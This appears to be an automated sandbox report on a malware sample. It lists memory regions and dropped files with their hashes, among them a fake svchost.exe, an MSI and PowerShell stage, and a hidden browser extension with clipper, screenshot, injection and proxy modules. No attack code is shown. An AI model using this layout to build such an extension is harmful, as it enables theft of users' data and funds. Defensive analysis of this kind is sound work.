memory/224-83-0x0000000004E10000-0x0000000004E20000-memory.dmp

memory/224-84-0x00000000079E0000-0x000000000805A000-memory.dmp

memory/224-85-0x00000000067A0000-0x00000000067BA000-memory.dmp

memory/224-86-0x0000000007360000-0x00000000073F6000-memory.dmp

memory/224-87-0x0000000006850000-0x0000000006872000-memory.dmp

memory/224-88-0x0000000008060000-0x0000000008604000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scrEFB6.ps1

MD5 753240f3d0c58563dcba1244db69b0d7
SHA1 4a0f248fccc2431ece50f717cbf80f6681504932
SHA256 e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a
SHA512 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

memory/224-90-0x00000000087E0000-0x00000000089A2000-memory.dmp

memory/224-91-0x0000000008EE0000-0x000000000940C000-memory.dmp

memory/224-95-0x0000000072FD0000-0x0000000073780000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msiEFB5.txt

MD5 eb0046beb949b23b97dccd59c4b8f131
SHA1 c084a9c15a323cd51d24122681a494e52577487f
SHA256 b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467
SHA512 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0

C:\Windows\Installer\e59d315.msi

MD5 9068f6d9bb1f01026f24c0c4204ee754
SHA1 3cf3d823e27bd8e6ed83b7932fc8f963a92b9ae0
SHA256 981a03ee5ca30de8489f5dabd9741633f5d462e1123bfe201872df191e907058
SHA512 3b6c0c8892153a8394afa1ad21d50cb7681d81b2582bbd445a532cfbd09c2fb486f10a763d11c8b09b9431b5b4ac22f12e74c67ff9f6ae844e7b97a26a79c9a0

C:\Config.Msi\e59d318.rbs

MD5 d4cd632952e3afae363580c5b45ce0ce
SHA1 b02e082d79b14375555e3fe50f5ba7b78f0be348
SHA256 6c2409d240e92a2e298681b09d291d2418da9133e1afb96c5dc78fe9cedf433a
SHA512 5ba59ebf0bd65913f40f07fe5c4cbd8b04cf618a5e5daa9ea40634ba80b0edd75827e3e7c9d5327ff6f34a33244250447a88b98a4effdcd545e07e382175b857

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

MD5 35365d3713500bde4e2e1422c54f04fa
SHA1 0b24b1de060caa7be51404d82da5fef05958a1da
SHA256 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19
SHA512 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll

MD5 a2dd12a8ecef27ca0e524e9bb4bdb8f5
SHA1 a4f5718c8bc1cc1fba49332d767ad296f7156dbc
SHA256 e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada
SHA512 b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll

MD5 8f4cdaed2399204619310cd76fd11056
SHA1 0f06ef5acde4f1e99a12cfc8489c1163dba910d1
SHA256 df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213
SHA512 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll

MD5 0381964390751461a5d79d26ca7cedaa
SHA1 3b17b9dca5060f9b22920737165a6bd1de5e8941
SHA256 7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da
SHA512 381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05

memory/4644-190-0x00000000007B0000-0x00000000007B1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll

MD5 b7b148054a2818699d93f96139b4d0d0
SHA1 0a5187b37bd84c19a7d2d84f328fa0adbc75123c
SHA256 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915
SHA512 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll

MD5 72498f59c8c580707a0a3839c332f51b
SHA1 fb09b912912610d243066cc8b71435f689e6a449
SHA256 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d
SHA512 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022

memory/4644-192-0x00000000007E0000-0x0000000000805000-memory.dmp

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll

MD5 aa26817666196ab6124306f153510196
SHA1 4e04d73cc0136d8fc5a2d021fa60372352f3de44
SHA256 4e28b376b164840e9104d38b57d71826e5ea945c700e951b1317906efd4c36b5
SHA512 e49d7428c13daf7f0026eeef932e8a1f7b8013b2361333e690a30fedb0e043038311e72cfa92cc50828eec0b6881efef85c754c660955a76fd08ec9861d5210d

memory/3400-194-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/3400-195-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/3400-196-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4644-197-0x0000000000400000-0x000000000054C000-memory.dmp

memory/4644-199-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/4644-201-0x000000006A800000-0x000000006A80F000-memory.dmp

memory/4644-200-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/3400-198-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4644-202-0x0000000066580000-0x00000000666AA000-memory.dmp

memory/4644-203-0x0000000063080000-0x00000000630A9000-memory.dmp

memory/720-206-0x0000016C22D80000-0x0000016C22DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bcbd743eaed3394be4983a623649c089
SHA1 2a5ed701863ea4eea112dfb5a725644cf53491b0
SHA256 c4537ef901e030a6ef3a9e8b4d8bb4d2fbfbc794ca2dee20f6316bbf97cd3d5c
SHA512 6927e4a6fc512f4723e7968add233688fdf212306674fea4c473c82adf7669f3c0c20399cd5c9652bfba689a13f0ed25e5897be28924107eae77d0531536b95a

memory/720-217-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp

memory/720-218-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp

memory/720-219-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp

memory/720-220-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe

MD5 a9c5924063a253f64fb86bc924be6996
SHA1 c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256 eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4
SHA512 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e

memory/720-240-0x0000016C23030000-0x0000016C2304C000-memory.dmp

memory/720-268-0x0000016C23490000-0x0000016C23652000-memory.dmp

memory/720-269-0x0000016C23B90000-0x0000016C240B8000-memory.dmp

memory/720-283-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 181630975fcbb9a2f398f18a0d2a008d
SHA1 c1cea6140e542decd77c91f4ff203a01f1c124d1
SHA256 590d8b42e9919ecec00177a9deaba84285bde1aa51bfd95036b62f9e3aa90db1
SHA512 4416f528b123099e5e4eae4bac9540a3fe1481925ffe3a81421b42d715696ae08b82323f8d38beff57d2b2b580aabc72e43db12e2f590fbe68279ab367bc2622

memory/3400-298-0x0000000000C10000-0x0000000000D10000-memory.dmp

memory/3400-299-0x0000000003BD0000-0x0000000003C58000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 98839119e51c0c08fe847217f8bba847
SHA1 37bbf0e28d34b73f49d70bc92444b3b069af9353
SHA256 32d9db13268428916788ae6766f62084432bab473f12dc23f7c03a71192663d9
SHA512 8de1280e56257ccc2730d3d36cf7eeb7cfef37a575481c346a4969ec6810f89f701a4725f4b09af152ab2cdb2f403cba1de23b86d48f35117234c2e3de3df1f5

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\ico.png

MD5 40de419c81de274c26c63e0f23d91a3f
SHA1 3fda2c10bf0d84aa327e107730b3596fcd13d4fd
SHA256 7d1878c4a74f2b7c6deb2efb39aa4c1cef86b8792efd2022644437cad6c48af3
SHA512 a6c0a9328941b31ab92d7de6bfedb7012a66e10f1726a3648d8314a49fd37dfbed06c199db04ddf6a0da6f9d42d9a78378ea67e7399fd847d48e4427bbb0ff99

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\mails\gmail.js

MD5 91fa3e1f56477c9c742012da1b862cd3
SHA1 4d5768220b6ec11e83611eb87875c0159df52118
SHA256 84a4795f7893cd3f5c711016ec1290e6e3e517a84ca37c1fc59f39c84cf05767
SHA512 05950accba7a74a00a8777950690f5b83926e6e6d65bfaf4aff1cc2f4d2eb9ab3b083112cf807f5e0088d5d54e3c0588264ea3fd71a2b27e84b4232bca9157ef

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\content\main.js

MD5 02bb5c3cf4607f6757520a356ed5f809
SHA1 896d19dc3aecfdf887345619281d49ec60748b22
SHA256 c608c392b7df42bfa4e8b44a3c1f1b4dd5539bdc13109954381c8895db0e97a1
SHA512 47bdb38a500a87a7d9a575a684ece011f5c3e8baf7168b29482ababdd72b6124aebc38d6bc3893c49637357dcb2e14bb8ee2adf632e9777bffc2cccec6359866

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\manifest.json

MD5 5f0908db2929344266e44e98c4b967b5
SHA1 68fa7988a9fc9b8116fa042fb58a6319580f23ac
SHA256 11dbcdb137654ecf047eabd22e0cc6b871c4ef030a8557fdcdbd48c2f105b723
SHA512 a37fc8c6d2bce7c36aa1854db07ddb23f40aa45627e28be10d8ab3357447b590c2bce9f81454570ca830ca67af27a41164322fb6f3e6bd8eb52431e2d00f04f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8994dca438d2a22b9fe22f4d8c87de77
SHA1 3ae53bf1463ce656e026359935e1282434fc524e
SHA256 f86e4e4ed48f9f0e9dd52ec89e151a32a900b471cab102bffb2bc63433d3d0f3
SHA512 9ed6388643dc97f5b729dae131d978395605d37f40b6dd1e86b4c55909b9c1ab32ebc21e5352344f1904ad7c44325a53299ee276b223be755d4933ddf8045e1b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 48f7e0d082a51ad77bd58d3f190faab9
SHA1 5c4c7e41804c104ca43e0ca3bd669934a03a0238
SHA256 f68673f9e357042d2823dc85ac144cf2e3d3843c452d001ad2023a90d1a015ad
SHA512 95420d2780bdd3c53e9a1e35401e59ce3e9d25512f20a41b8064a10ec0dbfe521c997243e086fb4e9f43cdd3a70ab33b4e8d66d878e5b01b435f01af0b4f7ff1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cf9ca130d859672477262d68d75c5aad
SHA1 6b4b1d96a055df2613484c6e79b20b42de1011c0
SHA256 8f56e6527caf02d77dce5aca498a66a42d731f437cc47341728c05d1eb91d130
SHA512 f82377ff3f0e32982ce04c4a460a45d621060485cff49edad7980a68fb95a70f16543c258b47365aa7fdb51fe1c8fe9bd2d933e8519e1f1dda6d012bc56df22c

\??\pipe\crashpad_1472_DIPVJTSKJMDMYJWM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\background.js

MD5 74e613e741449c83ac195b89fa584091
SHA1 9eb52b87c35576fb0707be6a3ba4636f2cedf577
SHA256 589a7ffba46286eb62bab2975206d94b217d4b473e0c6e4998d3cf875189716e
SHA512 4e15929e72125af7fd3c5640c24918ca573f7c2a5fd1992c6bfab69f78f951a40db4532b10645c66be312b38b2491829464758db6abdb0ba40252cf8fa85cb5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/3400-357-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3400-358-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3400-359-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3400-366-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3400-365-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/3400-372-0x0000000077080000-0x0000000077295000-memory.dmp

memory/3844-373-0x0000000000A90000-0x0000000000A99000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

MD5 b6f7a6b03164d4bf8e3531a5cf721d30
SHA1 a2134120d4712c7c629cdceef9de6d6e48ca13fa
SHA256 3d6f3f8f1456d7ce78dd9dfa8187318b38e731a658e513f561ee178766e74d39
SHA512 4b473f45a5d45d420483ea1d9e93047794884f26781bbfe5370a554d260e80ad462e7eeb74d16025774935c3a80cbb2fd1293941ee3d7b64045b791b365f2b63

memory/3844-389-0x0000000002760000-0x0000000002B60000-memory.dmp

memory/3400-390-0x0000000003BD0000-0x0000000003C58000-memory.dmp

memory/3844-391-0x0000000002760000-0x0000000002B60000-memory.dmp

memory/3400-392-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3844-393-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jnbdookjaigdccccilhfnijmckgmolhf\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/3844-401-0x0000000077080000-0x0000000077295000-memory.dmp

memory/3844-394-0x0000000002760000-0x0000000002B60000-memory.dmp

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\getMachineInfo.js

MD5 b8749f5669e5b61eff9d2636d64c7395
SHA1 9be21dcf99ad1c22b276cc0ac62a9ad05d09af5f
SHA256 b9868080ce91445034c3f90da4e8a3f126384bd235408ab996767804c5e1ccfb
SHA512 72ba034462e112ea88fec3f4a2532fb7cb949e42e431de8be55b8a37bb5bc184679f59e177d9f162e4b8d7acf8a55cd67014b46e09de442853a75f0935960eb7

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\exchangeSettings.js

MD5 ed2384585afe2026230dab9e503d75d6
SHA1 f50f6f426fbe3f7609e2ab65835a538b064d608d
SHA256 06d1ca3c3fe0d82b1a75dd6a97dae45e944fd98091e76887adc7f12fbfe46949
SHA512 4cffc3c02cb4406021fd45b1d8d2c03b8657b28fe8ee4782b7f1fcc9717975fa83993d8f000647a4f46ae397f73492c9475bf57e1a0896a32d2eb8e074715e2c

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\settings.js

MD5 4075373edbef7c32f49668cf71d0a0f0
SHA1 46bc8492b8b5070529578a51d9f1e652de877dc4
SHA256 2683ef8ce60567bdf4ff80ba343abbbc263d4b57fd7e7d25f362d3b19ccadbcf
SHA512 a57cbb030663ad2d5ab7ce9ee2c730ad3efe8518622f1724ffa9c4c6f69da1952966d332d001d2a890ef3503065e66d4bd58fcaa582fb4f789dbfd34a9ac03b0

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\screenshotRules.js

MD5 ebb088b2b3fd11c7f4c40006f7546a5e
SHA1 9ef92b7bf483f00717633561484caeb13bc0459a
SHA256 c4c7940136425b33ce5f69a72942d4bbf44b3699253c4f8caec344a7fe5f171c
SHA512 8cae952e5aaf71038eebf52a776e331f200db8ecc41a78624558bbfb769b0466d517b942e5ff7a441f0076844ea5ca327532cda5ed639c8f977df491e87d122b

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\screenshot.js

MD5 83e3e0934b07648eaff869a880f8e8d2
SHA1 5bde733355987b0cafa00606095c0ed3d4aef9c9
SHA256 d724c92845f92b8d882a31f17b7094f4815e99f5a5f32b7aed6ad15f3d3a8b5e
SHA512 25cada6dfe9fbad91041d0332dc967055f4ad5b4e325856af7a1beec6d87c729d1a562811798b82ff4315b42b059f7f2bec9d6e406fee70c68c92f833f98b4f3

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\domain.js

MD5 ea1275ea08c1ace2c12df7b1fbdc9ec6
SHA1 07823f2461d63842b1a40eb00f1d31af96d435ac
SHA256 f6871787558819998607f6f3ac0e3e5c0178e7fd451a8551430a77b140e0ee14
SHA512 d4f9de5398e52ccb62eaa08a5aa1acfbb0db792bd90575443d9ec98cd844b58de67b853c54457116311e4f6a20afc3ce22106bf396a05726be6f8fd76fe79f20

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\clipper.js

MD5 084c3ee93e6c89e5ab2fe1a830690631
SHA1 1e7366d273af950fab9731465c5cd12e3d153c49
SHA256 6f3360051868743b10f4ed348933d70f22a9574b970e28d988d5adeef4d71272
SHA512 9449088cc6f6d2afe557120ea0d8387662811f85115676f799ca06a64aee9f6b77f46edf987409a535122ab72ad1b40d000bde1821949c50145b6d8ab8aeb8e3

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\proxy.js

MD5 787a9cf08831c7d8aec4e5961cd4efa5
SHA1 e073fa3d89517dfe5f7b748a1e47c1b23f335031
SHA256 cf3fccbfc894657bc67d36821b1d3bcf924fd7ec101886ad9e60486ec1c51c7f
SHA512 f8b365fe7a68b4ed60e30c3e7a91b9533e863cd1652d8413ee60af63218186606bc5b9ab4aa15cc6e4c0bc69b1394d8aae1cec63997ece6c53ff74f05ae98781

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\csp.js

MD5 d4bc31826fea86f7d59629f234beb7af
SHA1 c9acb597c3daab33ae28ba79d78214e3868f7dfb
SHA256 3d719ce7728f5f727ccb3c8e1eabea3ad9e3744c5e9aa167a6938992d3065fc0
SHA512 fefd778cacd10328c8aec81f21eea8ea7bc10be3cbe3eeebb807d156280296d06ba2f5dec57a84bd1ddf1aacb1f6a07eff9d332a294f5d4591d5de324c5098fb

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\injections.js

MD5 7b23161290f67ff5c324269c998d5eaa
SHA1 224066999404170bd05a7ce7db081a29c9fc33f4
SHA256 e668570f5b5644cbdc25cc9d03fa9bad96d792cb0adf7f6cd95887f144a6d05e
SHA512 8ce5f7bcddc4b669c67d13405aee542555bacf72c380bc2fedf8924bd1fa4977c58c48d69885f795fa21120c5e74401cd11446f52c1caf156c18b01754d308b1

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\tabs.js

MD5 6b14682af71d2704652b5696ec171503
SHA1 bed9d09586eb0a36b4b0a5c94f58ad396b0ec4d8
SHA256 64230c97f0c3a41a00f2870ddf43c7395de5b2f670fd86defe9ed3c38a98cf41
SHA512 ebf1b684f1d1e88df84eadfc9f5e5b05c2de808b11a735c4fcc7e5eab18a0d1acaa8981dbe245de693c6565bb7e678ea9dd35af90dad68f64d2b6f0fef393598

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\config.js

MD5 a878ecacf4dc4aab506c9a254820c0b6
SHA1 39879f934be94420b44958de255656076868e471
SHA256 4af3507947e78a2513c700e292b97b86315b9cc09452dd06613c75e2e2785d12
SHA512 8c1ea24f3304c22c3fdaf470013cf16ba46e5509a8ca7b6fcd2483407301a7823d9285a7e78ec1ce1157145c2fe3bb3c5f3cf236e4edeba887a8666a1bd3867f

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\notifications.js

MD5 c3e86f0f429df23fdc99412ec7cb5ec5
SHA1 beb75283be1c64058659b96a8ed09ef8de86e1de
SHA256 f6bb14e081ec4f795faccec11ad6fd7fc4766c7fe9260fc72a9fdfadec8ec252
SHA512 9d606f87558450d6a48211ed8a7623968843f2b60d3d23d6934f767cf8a601e8e0faa41d5110967c99e671318b3bb62c7d0a898a7db7cbe596bca05b4fbd6190

memory/3844-461-0x0000000002760000-0x0000000002B60000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 319a6e936ea99a79ed12f245f4036963
SHA1 54e1ab2a2c2a6a90861bb1d949a25379ee2ee2f7
SHA256 2cb9cbe5cb69a689ee5ae0fb10cd84de8c074d2712547549062b07cd54965498
SHA512 e15fa5ae33c44d4e44646d745b19ebc25a4103b1252320c1d5f27a7da9644e16768476625bfbdef145986c775c7367085205e14107e30e980476d0ed803e4250

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 489b769a1a9d09a9a703bd96a7b5c21f
SHA1 97a0991976fa10af8b5b8ce073d9d965c3c13494
SHA256 4957d4d63830b470304cd9ba4a0b741cdc6d0eeadcf89f6bd9649220646aecd7
SHA512 262f1e3dfca3d1d76e2f784ff737213fee9dabdcde72637c9a6b15bc79ade920ee10308ab0936ad105aab3f525d591ea952c5371592272f7516b26f7dd431aa3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1a5073af3482804f9040b8cba135d5d4
SHA1 900ad2e4934c8257b968993c6d0ec87c325112fb
SHA256 148629523707b00b5c4e069e7250dbf5d8992df982cd5ead77dc693ae1837511
SHA512 3705697ced4a4cf088d941da4ce962fc4cbc2a191cf6637783b9e986b444f54ebb92d631787c52bf7c577d5bbb3051435503a961ded32d1fb4ef79cb4b0f63cf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 5123ade7a73f8adcc69dcb72fdaae1ac
SHA1 cf089058a4034ba0e2de7047d2bb963c08dffab3
SHA256 62fd354db499ae4e64c25906cfc01c0d0a3498263471e3c24c2744e35aede79f
SHA512 c0a9c55df12a179907f2f0ad6b8c68d9d867258d59fbdf2a5b31c1a423f022b67a24ee66e920dcc6e7bfc110894d4689b5f6ed1f045e7b912bba1fe3e6cf75bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9b71f176a47cff09137223b0244e2805
SHA1 c22d347c48b1857ae6297a4070c723c90f49b4f5
SHA256 91def744fc82ae05f8120e486feb0b4ed777ccdfc8ad71ec5131324323b1b838
SHA512 e00dfb23a04652bac312e2daf50138e79c1d9ead424be44e8263ab36b46c2e7802a833abd44062a6650690d319b6d9f2a4bf429d8aa059a28c53fa4a973bb6f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 7d8b03404e2e89b0b6eb68349917bbcd
SHA1 07d5524ee044bc0e9102398af605323c74013f50
SHA256 e35190f8838fbae157ab1ef63baf7bdf9e2fd4ae7b179f581c471faf3058b156
SHA512 f15c9cff49550b976e8a733b9cc79241a2e2d0e7ecb9512989994cad058481171847af413f097c3cc0418d5e32ec71041a8c1a8037fe9f4814fe957b9ecd18d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5b0c03.TMP

MD5 489f0dfbc6d01667889d4432be55c86d
SHA1 31fd85677df73a54c71383a542ff448a90452fa4
SHA256 31e5fe7ee32919adc981e54f41b772341ee9023996f7110131d56989ab6bea33
SHA512 74f3bd1c0f9ecdbd24c052b4832789b26554e38a6a448317af2df0ae13617faf2c2ec2b485cfb8bd80514e519de9f03ff065f392d265c4e430480ff2f862617c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 5524cba301c140331a1a2a2f7904be31
SHA1 73e4385dd1809c6bb527da4666323d31b715b45d
SHA256 3391c8c88e244b0463fab1a1f7772477307832752e25f5a7df51f7a2e0dde912
SHA512 fe194adc4778ab4658b160b4d18a3329551009649e32dea036f50e2942d4f276267348d261246bb5c020886820a865d7c68c59aa069021d4c5f6288bb6830e18

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

MD5 ab67e4770d689320881eeefd1f8ded07
SHA1 eb157c84187f6930a9060e4ac73dbe52bf73c8ff
SHA256 0377d4e9b609669d284576c9777a138a0c54fc89b3672d8869ac248fb99c579c
SHA512 2b141138a77dfedef4650225ffa6ebeb376d3f747e1b8e00365b671a9da45191b9af9da56af941f62b0140e08eb4930af38e2fc900b1d865c3abe32cfbc920b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Temp\269d6cb3-50e7-48b4-b9cd-93590fa10ce5.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7bcd0bea14fd7cf240db2b923760999e
SHA1 153359f9df51485f259b34bde05a7dc91744d826
SHA256 969c143f5d7cca340ef7a3356d7651c2f2edee9592cc3ea2721b810abadd6c11
SHA512 9ba63ac297f93c657626739258cee2912c584cfca2b3655da73d7b5aff53bf925022b333fcf5f292a9aec72148733f06235fa5790ced36ad8a8eeb527fa012d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 2597485e05dd1471d7119777b2a92666
SHA1 f1116746587b94222dc2b1c81bdaea3f443cdbff
SHA256 d128d60491fed723df4047ba57e1a9fbdcffca5f085f2a14e1fd7c0bfc63fc9e
SHA512 e3adbb408b61048f6be75b0dd7db09d3db85d9e726a515fc09aae052f872335e9da97a4fc5202135e1b270711ca244481dd52c5870db3efa312eafa1a6f35a7f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 b0f6eb97dee086c9e180067a064862c0
SHA1 accf4fdc9a88769369051e9ee0a7b2c723ec3f25
SHA256 b8bb0db75c84f0d8e4a03179c80dd7a8009d3997b6cf47daf0673b9075ee0826
SHA512 b18933491a9abb02fc39cdc72213e82b2f02329cccf4464062d857e6ab7325ead50e8cc204e7a76934b1574ec494dc9a650e247ea1b1953da2c87674747cfaa9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6ba87141618efbb3ecbe57f1bf47b700
SHA1 aee29e69ca09cd1db5592a54fabceb40f91d1822
SHA256 f6e68f3e58108b5c89a293f9a7865c5ee357cb805c0ab4b1ebf085baf3cbfc68
SHA512 093538e946a1b2d5e61c303274b188518c0cb356566189eea30f2e2cb8a66d2dc8c970735032539e4e88643e8e8dd0220390f7c8ad6f584e2ddc84237bdd316d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

